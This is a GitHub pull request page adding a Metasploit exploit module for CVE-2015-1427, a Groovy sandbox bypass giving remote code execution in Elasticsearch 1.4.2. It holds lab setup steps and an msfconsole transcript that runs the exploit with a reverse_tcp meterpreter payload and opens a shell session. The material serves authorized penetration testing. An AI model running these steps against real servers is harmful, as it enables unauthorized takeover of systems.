New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add module for CVE-2015-1427, elasticsearch groovy code injection #4907

Merged
merged 8 commits into from Mar 12, 2015

Conversation

Projects
None yet
3 participants
@jvazquez-r7
Contributor

jvazquez-r7 commented Mar 10, 2015

This module adds a msf module for CVE-2015-1427, a RCE in elasticsearch due to the groovy sandbox bypass discovered recently. Also improves the old script_mvel_rce check to avoid false positives.

This module has been tested with Elastic 1.4.2 on Ubuntu 12.04 server (32 bits) and Windows.

Verification

  • Install Ubuntu 12.04 server (32 bits)
  • Install openjdk jdk 7: sudo apt-get install openjdk-7-jdk
  • Install Elastic search 1.4.2, it can be donwloaded from its homepage.
  • Execute elasticsearch `bin\elasticsearch'
  • Create one index
juan@ubuntu:~$ curl -XPUT 'http://localhost:9200/twitter/'
{"acknowledged":true}juan@ubuntu:~$ 
  • Add at least one document to the index
curl -XPUT 'http://localhost:9200/twitter/tweet/1' -d '{
> "user" : "kimchy",
> "post_date" : "2009-11-15T14:12:12",
> "message" : "trying out Elasticsearch"
> }'
{"_index":"twitter","_type":"tweet","_id":"1","_version":1,"created":true}juan@ubuntu:~$
  • Run the module, hopefully enjoy sessions
msf > use exploit/multi/elasticsearch/search_groovy_script
msf exploit(search_groovy_script) > set RHOST 172.16.158.131
RHOST => 172.16.158.131
msf exploit(search_groovy_script) > check
[+] 172.16.158.131:9200 - The target is vulnerable.
msf exploit(search_groovy_script) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(search_groovy_script) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(search_groovy_script) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.131:9200 - Checking vulnerability...
[*] 172.16.158.131:9200 - Discovering TEMP path...
[+] 172.16.158.131:9200 - TEMP path on '/tmp'
[*] 172.16.158.131:9200 - Discovering remote OS...
[+] 172.16.158.131:9200 - Remote OS is 'Linux'
[*] 172.16.158.131:9200 - Trying to load metasploit payload...
[*] Sending stage (30680 bytes) to 172.16.158.131
[+] Deleted /tmp/EmGWzsL.jar

meterpreter > getuid
sServer username: juan
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux 3.8.0-29-generic (i386)
Meterpreter : java/java
meterpreter >
@carnal0wnage

This comment has been minimized.

carnal0wnage commented on 9e17874 Mar 11, 2015

<3 this

@jvazquez-r7

This comment has been minimized.

Contributor

jvazquez-r7 commented Mar 11, 2015

Thanks @carnal0wnage :-) I'm glad you think it's useful!

@wchen-r7 wchen-r7 self-assigned this Mar 12, 2015

@wchen-r7 wchen-r7 merged commit 8a452a7 into rapid7:master Mar 12, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request Mar 12, 2015

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment